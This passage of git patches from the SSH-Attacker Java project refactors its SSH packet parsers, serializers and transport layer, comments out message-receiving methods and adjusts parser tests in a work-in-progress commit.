PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) throws ParserException { try { @@ -73,7 +69,7 @@ public PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPositi return new PacketLayerParseResult(null, rawBytes.length - startPosition, true); } } - } + }*/ @Override protected void decryptPacket(AbstractPacket packet) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java index 1eaeab0e4..462140a50 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/layer/BlobPacketLayer.java @@ -7,10 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.layer; -import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,7 +19,7 @@ public BlobPacketLayer(SshContext context) { super(context); } - @Override + /* @Override public PacketLayerParseResult parsePacket(byte[] rawBytes, int startPosition) throws ParserException { try { @@ -48,5 +45,5 @@ public PacketLayerParseResult parsePacketSoftly(byte[] rawBytes, int startPositi LOGGER.warn("Could not parse provided data as blob packet, dropping remaining bytes"); return new PacketLayerParseResult(null, rawBytes.length - startPosition, true); } - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java index 8fe1c3af7..c629dc441 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/AbstractPacketParser.java @@ -7,9 +7,8 @@ */ package de.rub.nds.sshattacker.core.packet.parser; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.layer.data.Parser; - +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import java.io.InputStream; public abstract class AbstractPacketParser extends Parser { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 17a605a89..a1ba8cd4a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -15,7 +15,6 @@ import de.rub.nds.sshattacker.core.packet.cipher.PacketChaCha20Poly1305Cipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketMacedCipher; - import java.io.InputStream; import java.util.Arrays; import org.apache.logging.log4j.LogManager; @@ -32,26 +31,27 @@ public class BinaryPacketParser extends AbstractPacketParser { */ private final int sequenceNumber; -/* + /* + public BinaryPacketParser( + byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { + super(array, startPosition); + this.activeDecryptCipher = activeDecryptCipher; + this.sequenceNumber = sequenceNumber; + } + */ + public BinaryPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - super(array, startPosition); + InputStream stream, PacketCipher activeDecryptCipher, int sequenceNumber) { + super(stream); this.activeDecryptCipher = activeDecryptCipher; this.sequenceNumber = sequenceNumber; } -*/ - - public BinaryPacketParser(InputStream stream) { - super(stream); - } - - - //@Override - public BinaryPacket parse() { + @Override + public void parse(BinaryPacket binaryPacket) { LOGGER.debug("Parsing BinaryPacket from serialized bytes:"); try { - BinaryPacket binaryPacket = new BinaryPacket(); + // BinaryPacket binaryPacket = new BinaryPacket(); if (activeDecryptCipher.getEncryptionAlgorithm() == EncryptionAlgorithm.CHACHA20_POLY1305_OPENSSH_COM) { LOGGER.debug("Packet structure: ChaCha20-Poly1305"); @@ -95,10 +95,12 @@ public BinaryPacket parse() { LOGGER.debug("MAC: [empty]"); } } - return binaryPacket; + // return binaryPacket; } catch (CryptoException e) { LOGGER.warn("Caught a CryptoException while parsing an encrypted binary packet", e); - return null; + // + // + // return null; } } @@ -165,7 +167,7 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { * byte[n] ciphertext ; n = 4 + packet_length (decryption of first block required) * byte[m] mac ; m = length of mac output */ - int pointer = getPointer(); + // int pointer = getPointer(); int blockSize = activeDecryptCipher.getEncryptionAlgorithm().getBlockSize(); int decryptedByteCount = 0; // Loop required for stream cipher support (effective block length is 1 in this case) @@ -184,7 +186,7 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { firstBlock = ArrayConverter.concatenate(firstBlock, decryptedBlock); decryptedByteCount += blockSize; } while (decryptedByteCount < BinaryPacketConstants.LENGTH_FIELD_LENGTH); - setPointer(pointer); + // setPointer(pointer); computations.setPlainPacketBytes(firstBlock, true); binaryPacket.setLength( @@ -198,9 +200,4 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); } - - @Override - public void parse(BinaryPacket binaryPacket) { - - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java index 66ac5baad..9f23734a6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java @@ -9,11 +9,10 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.packet.BlobPacket; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class BlobPacketParser extends AbstractPacketParser { private static final Logger LOGGER = LogManager.getLogger(); @@ -28,11 +27,6 @@ public BlobPacketParser(InputStream stream) { @Override public void parse(BlobPacket blobPacket) { - - } - - //@Override - public BlobPacket parse() { LOGGER.debug("Parsing BlobPacket from serialized bytes:"); BlobPacket packet = new BlobPacket(); @@ -43,6 +37,6 @@ public BlobPacket parse() { "Complete packet bytes: {}", ArrayConverter.bytesToHexString(packet.getCompletePacketBytes().getValue())); - return packet; + // return packet; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java index 53fab599b..1ab08d5cb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/AbstractPacketPreparator.java @@ -7,8 +7,8 @@ */ package de.rub.nds.sshattacker.core.packet.preparator; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java index 755db1141..1cfd63bc5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BinaryPacketPreparator.java @@ -7,11 +7,9 @@ */ package de.rub.nds.sshattacker.core.packet.preparator; -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; -import de.rub.nds.sshattacker.core.protocol.transport.message.DebugMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java index 6cf14aea9..666c72d9a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/preparator/BlobPacketPreparator.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.packet.preparator; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; @@ -32,7 +31,6 @@ public BlobPacketPreparator( this.compressor = compressor; } - @Override public void prepare() { LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java index af612394c..3b752091e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/AbstractPacketSerializer.java @@ -7,7 +7,7 @@ */ package de.rub.nds.sshattacker.core.packet.serializer; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.layer.data.Serializer; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; public abstract class AbstractPacketSerializer extends Serializer {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializer.java index 75909fc24..e817dae22 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BinaryPacketSerializer.java @@ -26,7 +26,7 @@ public BinaryPacketSerializer(BinaryPacket binaryPacket) { } @Override - protected void serializeBytes() { + protected byte[] serializeBytes() { LOGGER.debug("Serializing BinaryPacket to bytes:"); Set encryptedFields = @@ -59,5 +59,6 @@ protected void serializeBytes() { LOGGER.trace( "Complete packet bytes: {}", ArrayConverter.bytesToHexString(binaryPacket.getCompletePacketBytes().getValue())); + return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BlobPacketSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BlobPacketSerializer.java index 855ff542b..876fde47b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BlobPacketSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/serializer/BlobPacketSerializer.java @@ -23,7 +23,7 @@ public BlobPacketSerializer(BlobPacket packet) { } @Override - protected void serializeBytes() { + protected byte[] serializeBytes() { LOGGER.debug("Serializing BlobPacket"); appendBytes(packet.getCiphertext().getValue()); LOGGER.debug( @@ -31,5 +31,6 @@ protected void serializeBytes() { + ArrayConverter.bytesToHexString(packet.getCiphertext().getValue())); packet.setCompletePacketBytes(getAlreadySerialized()); + return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index bf91a3070..9b05976a8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -117,7 +117,7 @@ public void execute(State state) throws WorkflowExecutionException { SshContext forwardToCtx = state.getSshContext(forwardToAlias); receiveMessages(receiveFromCtx); forwardMessages(forwardToCtx); - handleReceivedMessages(receiveFromCtx); + // handleReceivedMessages(receiveFromCtx); applyMessages(forwardToCtx); } @@ -155,7 +155,7 @@ protected void forwardMessages(SshContext forwardToCtx) { } } - protected void handleReceivedMessages(SshContext ctx) { + /* protected void handleReceivedMessages(SshContext ctx) { receivedMessages = receiveMessageHelper.handleReceivedBytes(ctx, receivedBytes).getMessageList(); String expected = getReadableString(messages); @@ -164,7 +164,7 @@ protected void handleReceivedMessages(SshContext ctx) { LOGGER.info("Received Messages (" + receiveFromAlias + "): " + received); executedAsPlanned = checkMessageListsEquals(messages, receivedMessages); - } + }*/ /** * Apply the contents of the messages to the given TLS context. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java index 2e0bfd0ca..5b171e483 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java @@ -70,7 +70,7 @@ public void execute(State state) throws WorkflowExecutionException { initLoggingSide(receiveFromCtx); receiveMessages(receiveFromCtx); - handleReceivedMessages(receiveFromCtx); + // handleReceivedMessages(receiveFromCtx); filterMessages(receiveFromCtx, forwardToCtx); forwardMessages(forwardToCtx); applyMessages(forwardToCtx); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java index e6b7a3ef4..23cf8baa7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java @@ -9,18 +9,12 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CharConstants; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.layer.PacketLayerParseResult; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; import java.io.IOException; import java.util.ArrayList; -import java.util.LinkedList; import java.util.List; -import java.util.Optional; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -35,9 +29,9 @@ public class ReceiveMessageHelper { * @param context The SSH context * @return A message action result containing the received packets and messages */ - public MessageActionResult receiveMessages(SshContext context) { + /* public MessageActionResult receiveMessages(SshContext context) { return receiveMessages(context, new LinkedList<>()); - } + }*/ /** * Receives and handles messages from the underlying transport handler. @@ -46,7 +40,7 @@ public MessageActionResult receiveMessages(SshContext context) { * @param expectedMessages A list of expected messages * @return A message action result containing the received packets and messages */ - public MessageActionResult receiveMessages( + /* public MessageActionResult receiveMessages( SshContext context, List> expectedMessages) { MessageActionResult result = new MessageActionResult(); try { @@ -75,7 +69,7 @@ public MessageActionResult receiveMessages( context.setReceivedTransportHandlerException(true); } return result; - } + }*/ /** * Receives bytes from the underlying transport handler. @@ -122,27 +116,29 @@ private byte[] receiveAdditionalBytes(SshContext context) { * @param receivedBytes Received bytes to handle * @return A MessageActionResult containing the parsed packets and messages */ - public MessageActionResult handleReceivedBytes(SshContext context, byte[] receivedBytes) { - if (receivedBytes.length == 0) { - return new MessageActionResult(); - } + /* public MessageActionResult handleReceivedBytes(SshContext context, byte[] receivedBytes) { + if (receivedBytes.length == 0) { + return new MessageActionResult(); + } - int dataPointer = 0; - List retrievedPackets = new LinkedList<>(); - List> parsedMessages = new LinkedList<>(); - do { - PacketLayerParseResult parseResult = parsePacket(context, receivedBytes, dataPointer); - Optional parsedPacket = parseResult.getParsedPacket(); - if (parsedPacket.isPresent()) { - /*ProtocolMessage message = context.getMessageLayer().parse(parsedPacket.get()); - message.getHandler(context).adjustContext(); - retrievedPackets.add(parsedPacket.get()); - parsedMessages.add(message);*/ + int dataPointer = 0; + List retrievedPackets = new LinkedList<>(); + List> parsedMessages = new LinkedList<>(); + do { + PacketLayerParseResult parseResult = parsePacket(context, receivedBytes, dataPointer); + Optional parsedPacket = parseResult.getParsedPacket(); + if (parsedPacket.isPresent()) { + */ + /*ProtocolMessage message = context.getMessageLayer().parse(parsedPacket.get()); + message.getHandler(context).adjustContext(); + retrievedPackets.add(parsedPacket.get()); + parsedMessages.add(message);*/ + /* } dataPointer += parseResult.getParsedByteCount(); } while (dataPointer < receivedBytes.length); return new MessageActionResult(retrievedPackets, parsedMessages); - } + }*/ /** * Parses the given bytes into AbstractPackets. If parsing fails, the method will try to receive @@ -156,7 +152,7 @@ public MessageActionResult handleReceivedBytes(SshContext context, byte[] receiv * @return The parse result from the underlying packet layer containing the total number of * bytes parsed as well as the parsed packet itself */ - private PacketLayerParseResult parsePacket( + /* private PacketLayerParseResult parsePacket( SshContext context, byte[] packetBytes, int startPosition) { try { return context.getPacketLayer().parsePacket(packetBytes, startPosition); @@ -181,7 +177,7 @@ private PacketLayerParseResult parsePacket( LOGGER.debug(e); return context.getPacketLayer().parsePacketSoftly(packetBytes, startPosition); } - } + }*/ /** * Tests if receiving should continue based on a list of expected and received messages. Will diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflow.java b/SSH-Core/src/test/java/executing/NetcatWorkflow.java index 7ecf21e6f..34aab0d9f 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflow.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflow.java @@ -87,7 +87,7 @@ public static void main(String[] args) throws Exception { while (true) { // noinspection BusyWait Thread.sleep(5000); - receiveMessageHelper.receiveMessages(state.getSshContext()); + // receiveMessageHelper.receiveMessages(state.getSshContext()); } } } diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java index 7f9b9fddd..b3c472bb5 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java @@ -43,12 +43,12 @@ public static void main(String[] args) throws Exception { while (true) { // noinspection BusyWait Thread.sleep(5000); - receiveMessageHelper.receiveMessages(state.getSshContext()); + // receiveMessageHelper.receiveMessages(state.getSshContext()); String read = in.readLine(); ChannelDataMessage dataMessage = new ChannelDataMessage(); dataMessage.setRecipientChannelId(Modifiable.explicit(0)); dataMessage.setData((read + "\n").getBytes()); - sendMessageHelper.sendMessage(state.getSshContext(), dataMessage); + // sendMessageHelper.sendMessage(state.getSshContext(), dataMessage); } } } From 8169382da40e18e5f96cb550094776bfbedbeee3 Mon Sep 17 00:00:00 2001 From: Steffen Date: Fri, 9 Jun 2023 12:40:01 +0200 Subject: [PATCH 010/176] wip: adjusting Tests accordingly --- .idea/SSH-Attacker.iml | 9 +++ .../core/layer/LayerConfiguration.java | 2 +- .../core/layer/LayerProcessingResult.java | 2 +- .../core/layer/ReceiveLayerConfiguration.java | 2 +- .../layer/SpecificSendLayerConfiguration.java | 2 +- .../core/layer/impl/SSH2Layer.java | 22 ++++---- .../core/layer/impl/TransportLayer.java | 56 +++++++++++++------ .../HintedInputStreamAdapterStream.java | 3 +- .../packet/layer/AbstractPacketLayer.java | 4 +- .../core/session/cipher/SessionCipher.java | 5 +- .../core/crypto/KeyDerivationTest.java | 43 ++++++++------ .../core/crypto/kex/RsaKeyExchangeTest.java | 2 +- .../UserAuthBannerMessageParserTest.java | 7 ++- .../UserAuthFailureMessageParserTest.java | 7 ++- .../UserAuthSuccessMessageParserTest.java | 6 +- .../common/CyclicParserSerializerTest.java | 16 ++++-- .../parser/ChannelCloseMessageParserTest.java | 7 ++- .../parser/ChannelDataMessageParserTest.java | 7 ++- .../parser/ChannelEofMessageParserTest.java | 7 ++- .../ChannelExtendedDataMessageParserTest.java | 6 +- .../ChannelFailureMessageParserTest.java | 7 ++- ...nnelOpenConfirmationMessageParserTest.java | 6 +- .../ChannelOpenFailureMessageParserTest.java | 7 ++- .../ChannelOpenSessionMessageParserTest.java | 7 ++- .../ChannelSuccessMessageParserTest.java | 7 ++- .../ChannelWindowAdjustMessageParserTest.java | 6 +- ...GlobalRequestFailureMessageParserTest.java | 9 ++- ...GlobalRequestSuccessMessageParserTest.java | 6 +- .../parser/DebugMessageParserTest.java | 6 +- ...hGexKeyExchangeGroupMessageParserTest.java | 6 +- ...hGexKeyExchangeReplyMessageParserTest.java | 6 +- .../DhKeyExchangeReplyMessageParserTest.java | 7 ++- .../parser/DisconnectMessageParserTest.java | 7 ++- .../EcdhKeyExchangeInitMessageParserTest.java | 6 +- ...EcdhKeyExchangeReplyMessageParserTest.java | 6 +- .../parser/IgnoreMessageParserTest.java | 7 ++- .../KeyExchangeInitMessageParserTest.java | 7 ++- .../parser/NewKeysMessageParserTest.java | 6 +- .../RsaKeyExchangeDoneMessageParserTest.java | 7 ++- ...RsaKeyExchangePubkeyMessageParserTest.java | 6 +- .../ServiceAcceptMessageParserTest.java | 7 ++- .../ServiceRequestMessageParserTest.java | 7 ++- .../UnimplementedMessageParserTest.java | 7 ++- .../VersionExchangeMessageParserTest.java | 7 ++- 44 files changed, 254 insertions(+), 121 deletions(-) create mode 100644 .idea/SSH-Attacker.iml diff --git a/.idea/SSH-Attacker.iml b/.idea/SSH-Attacker.iml new file mode 100644 index 000000000..d6ebd4805 --- /dev/null +++ b/.idea/SSH-Attacker.iml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java index 776201602..f13604580 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerConfiguration.java @@ -16,7 +16,7 @@ * Contains a list of {@link DataContainer} with additional information about how to send and * receive them and whether they were sent/received correctly. * - * @param + * @param Container */ public abstract class LayerConfiguration { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java index f533d56d5..98568a05f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerProcessingResult.java @@ -14,7 +14,7 @@ /** * Contains information about a layers actions, both after sending and receiving data. * - * @param + * @param Template */ public class LayerProcessingResult { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java index a65486fd4..c6d5cc0f5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ReceiveLayerConfiguration.java @@ -15,7 +15,7 @@ * Abstracts different ReceiveConfigurations. A ReceiveLayerConfiguration always specifies a list of * containers the layer should receive. * - * @param + * @param container */ public abstract class ReceiveLayerConfiguration extends LayerConfiguration { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java index 553e8d593..ccf088efa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificSendLayerConfiguration.java @@ -14,7 +14,7 @@ /** * Send configuration that sends a list of containers to the recipient. * - * @param + * @param Container */ public class SpecificSendLayerConfiguration extends LayerConfiguration { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index da770bc80..d78e14c95 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -27,17 +27,13 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.common.layer.MessageLayer; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import java.io.ByteArrayOutputStream; @@ -75,17 +71,23 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { - if (containerAlreadyUsedByHigherLayer(message) - || !prepareDataContainer(message, context)) { - continue; - } - - MessageLayer messageLayer = context.getMessageLayer(); + /* + if (containerAlreadyUsedByHigherLayer(message) + || !prepareDataContainer(message, context)) { + continue; + } + */ + + /*MessageLayer messageLayer = context.getMessageLayer(); AbstractPacket packet = messageLayer.serialize(message); Preparator preparator = packet.getPreparator(context); preparator.prepare(); Serializer serializer = packet.getSerializer(context); + byte[] serializedMessage = serializer.serialize();*/ + + ProtocolMessageSerializer serializer = message.getSerializer(context); byte[] serializedMessage = serializer.serialize(); + message.setCompleteResultingMessage(serializedMessage); getLowerLayer().sendData(null, serializedMessage); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 70817c3a3..beb4f9ed0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -21,7 +21,6 @@ import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.exceptions.PreparationException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; @@ -37,7 +36,6 @@ import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.util.LinkedList; @@ -161,6 +159,24 @@ public LayerProcessingResult sendData( "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); } + AbstractPacket packet; + if (context.getPacketLayerType() == PacketLayerType.BLOB) { + packet = new BlobPacket(); + } else { + packet = new BinaryPacket(); + } + packet.setPayload(additionalData); + + Preparator preparator = packet.getPreparator(context); + preparator.prepare(); + Serializer serializer = packet.getSerializer(context); + byte[] serializedMessage = serializer.serialize(); + + List packets = new LinkedList<>(); + packets.add(packet); + + /* + List packets = new LinkedList<>(); List givenPackets = getLayerConfiguration().getContainerList(); @@ -169,24 +185,32 @@ public LayerProcessingResult sendData( while (givenPackets.size() > 0 && dataToBeSent > 0) { AbstractPacket nextPacket = givenPackets.remove(0); packets.add(nextPacket); - /* int recordData = - (nextPacket.get() != null - ? nextPacket.getMaxRecordLengthConfig() - : context.getChooser().getOutboundMaxRecordDataSize()); - dataToBeSent -= recordData;*/ + */ + /* int recordData = + (nextPacket.get() != null + ? nextPacket.getMaxRecordLengthConfig() + : context.getChooser().getOutboundMaxRecordDataSize()); + dataToBeSent -= recordData;*/ + /* } ByteArrayOutputStream stream = new ByteArrayOutputStream(); + + // prepare, serialize, and send records for (AbstractPacket packet : packets) { - /* ProtocolMessageType contentType = packet.getContentMessageType(); - if (contentType == null) { - contentType = type; - }*/ - /* if (encryptor.getRecordCipher(writeEpoch).getState().getVersion().isDTLS()) { - record.setEpoch(writeEpoch); - }*/ + */ + /* ProtocolMessageType contentType = packet.getContentMessageType(); + if (contentType == null) { + contentType = type; + }*/ + /* + */ + /* if 